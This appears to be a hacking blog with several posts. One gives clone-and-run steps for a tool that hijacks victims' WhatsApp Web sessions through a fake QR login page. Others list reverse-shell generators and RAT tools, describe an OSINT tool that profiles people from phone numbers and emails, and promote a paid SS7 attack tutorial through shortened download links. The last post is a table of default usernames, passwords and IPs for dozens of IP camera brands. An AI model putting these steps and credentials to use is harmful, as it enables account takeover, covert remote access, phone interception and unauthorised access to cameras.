17 Eylül 2023 Pazar

whatsapp-hacking

WhatsApp-hacking

Hack WhatsApp web
Hack WhatsApp web via a cloned website

Requirements
• Python >= 3.6.3 • Flask==1.0.2 • Selenium==3.7.0 • Gecko Driver

Disclaimer
THIS IS FOR DEMONSTRATIVE PURPOSES ONLY.

DO NOT USE ON REAL VICTIMS FOR ANY REASON. CRIMINAL LAW WILL APPLY.

Installation
pkg install python3

git clone https://github.com/TermuxHackz/whatsapp-hacking

cd whatsapp-hacking

_install the requirements

pip install -r requirements.txt

_Run the grabber

python3 grabber.py

_Run the Server

python3 server.py

As the victim scans the QR on the fake website, WhatsApp web on the browser spawned by the grabber will be connected to the victim's number.


16 Eylül 2023 Cumartesi

X-Osint

X-osint
This is an osint tool which gathers useful and yet credible valid information about a phone number, user's email address and ip address and more to come in future updates.




Features
IP Address information gathering
Email Address information gathering
Phone number information gathering
Host finding
Ports finding
Subdomain Enumeration
CVE Exploits Finder
Email Finder
Exploit Open Source Vulnerability Database
DNS Lookup
DNS Reverse
Vin extractor
Protonmail OSINT And many more...

Requirements
python-3
pip
Internet Connection
And some other python packages

Installation
cd $HOME
git clone https://github.com/TermuxHackz/X-osint
cd X-osint
chmod +x *
bash setup.sh

Installation using python virtual environment if normal installation doesnt work
The normal installation of Xosint might likely have some issues running or installing due to some missing python packages, use this method only if the normal installation and usage doesnt work!!

cd $HOME
git clone https://github.com/TermuxHackz/X-osint
cd X-osint
chmod +x *.sh
python3 -m venv X-osint_venv
source X-osint_venv/bin/activate�./setup.sh
pip install google
python xosint



Shell

Shell 🐚

🔹 Goshell - Generate reverse shells in command line with Go. 
🔗https://github.com/eze-kiel/goshell

🔹Print-My-Shell - Python script wrote to automate the process of generating various reverse shells.
🔗https://github.com/sameera-madushan/Print-My-Shell

🔹Reverse-shell-generator - Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs)
🔗https://github.com/0dayCTF/reverse-shell-generator

🔹Girsh - Automatically spawn a reverse shell fully interactive for Linux or Windows victim.
🔗https://github.com/nodauf/Girsh

🔹 Blueshell - Generate a reverse shells for Red Team.
🔗https://github.com/whitehatnote/BlueShell

🔹Clink - Powerful Bash-style command line editing for cmd.exe.
🔗http://mridgers.github.io/clink/

🔹Natpass - A new RAT Tools, Support Web VNC and Webshell.
🔗https://github.com/jkstack/natpass

🔹Platypus 🔨 A modern multiple reverse shell sessions manager written in Go.
🔗https://github.com/WangYihang/Platypus

🔹shells - Script for generating revshells.
🔗https://github.com/4ndr34z/shells/

🔹Reverse_ssh - SSH based reverse shell.
🔗https://github.com/NHAS/reverse_ssh

🔹Hoaxshell - A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.
🔗https://github.com/t3l3machus/hoaxshell

🔖#infosec #cybersecurity #hacking #pentesting #security 

15 Eylül 2023 Cuma

SS7 ATTACK

🔥 SS7 Attack Paid Tutorial⭐️

👁 Language : English

🌈Hijacking Network Elements Over SS7 - A New Type of Attack

🌈What is Signaling SS7 in GSM & Cellular wireless Networks

🌈Software & Hardware Need for SS7

🌈SS7 attack Part - 2 Kali Linux
SS7 - Part - 3 Cell Phone Signal Jammer Kali Linux

🌈SS7 GSM Sniffing Wireshark 100 % True

🌈SS7 And GSM Arsenal Installed Kali Linux

🌈SS7 Dependence Install Kali Linux 2020.2

➖➖➖➖➖➖➖➖➖➖

⛏ 🔹Download Here - 

🔗 Download Link 1:- https://link-center.net/886759/ss7-attack-paid-tutorial (Linvertise Link)
🔗 Download Link 2:- https://onotepad.com/sdTJDP (GP Link)

➖➖➖➖➖➖➖➖➖➖




30 Mart 2023 Perşembe

For other brands usernames and passwords please see below:

Camera Manufacturer

Username

Password

Default IP

3xLogic 

admin

12345

192.0.0.64

ACTI

Admin or admin

123456

192.168.0.100

American Dynmics

admin

admin

192.168.1.168

Arecont Vision

admin

no set password

no default/DHCP

Avigilon

admin

admin

no default/DHCP

Axis

root

pass or no set password

192.168.0.90

Basler

admin

admin

192.168.100.x

Bosch

service

service

192.168.0.1

Bosch

Dinion

no set password

192.168.0.1

Brickcom

admin

admin

192.168.1.1

Canon

root

Model# of camera

192.168.100.1

CBC Ganz

admin

admin

192.168.100.x

Cisco

no default

no set password

192.168.0.100

CNB

root

admin

192.168.123.100

Costar

root

root

unknown

Dahua

admin

admin

192.168.1.108

Digital Watchdog

admin

admin

192.168.1.123

DRS

admin

1234

192.168.0.200

DVTel

Admin

1234

192.168.0.250

DynaColor

Admin

1234

192.168.0.250

FLIR

admin

fliradmin

192.168.250.116

Foscam

admin

[leave blank]

unknown

GeoVision

admin

admin

192.168.0.10

Grandstream

admin

admin

192.168.1.168

GVI

Admin

1234

192.168.0.250

HIKVision

admin

12345

192.0.0.64

Honeywell

administrator

1234

no default/DHCP

IOImage

admin

admin

192.168.123.10

IPX-DDK

root

Admin or admin

192.168.1.168

IQInvision

root

system

no default/DHCP

JVC

admin

Model# of camera

no default/DHCP

LTS

admin

123456

192.0.0.64

March Networks

admin

[leave blank]

unknown

Merit Lilin Camera

admin

pass

no default/DHCP

Merit Lilin Recorder

admin

1111

no default/DHCP

Messoa

admin

Model# of camera

192.168.1.30

Mobotix

admin

meinsm

no default/DHCP

Northern

admin

12345

192.168.1.64

Panasonic

admin

12345

192.168.0.253

Panasonic

admin1

password

192.168.0.253

Pelco

admin

admin

no default/DHCP

PiXORD

admin

admin

192.168.0.200

PiXORD

root

pass

192.168.0.200

QVIS

Admin

1234

192.168.0.250

Samsung

root

4321 or admin

192.168.1.200

Samsung

admin

4321 or 1111111

192.168.1.200

Sanyo

admin

admin

192.168.0.2

Sentry360

Admin

1234

192.168.0.250

Sony

admin

admin

192.168.0.100

Speco

root

root

192.168.1.7

Speco

admin

admin

192.168.1.7

StarDot

admin

admin

no default/DHCP

Starvedia

admin

no set password

no default/DHCP

Toshiba

root

ikwb

192.168.0.30

Trendnet

admin

admin

192.168.10.1

UDP 

root

unknown

unknown

Ubiquite

ubnt

ubnt

192.168.1.20

W-Box

admin

wbox123

192.0.0.64

Wodsee

admin

[leave blank]

unknown

Verint

admin

admin

no default/DHCP

VideoIQ

supervisor

supervisor

no default/DHCP

Vivotex

root

no set password

no default/DHCP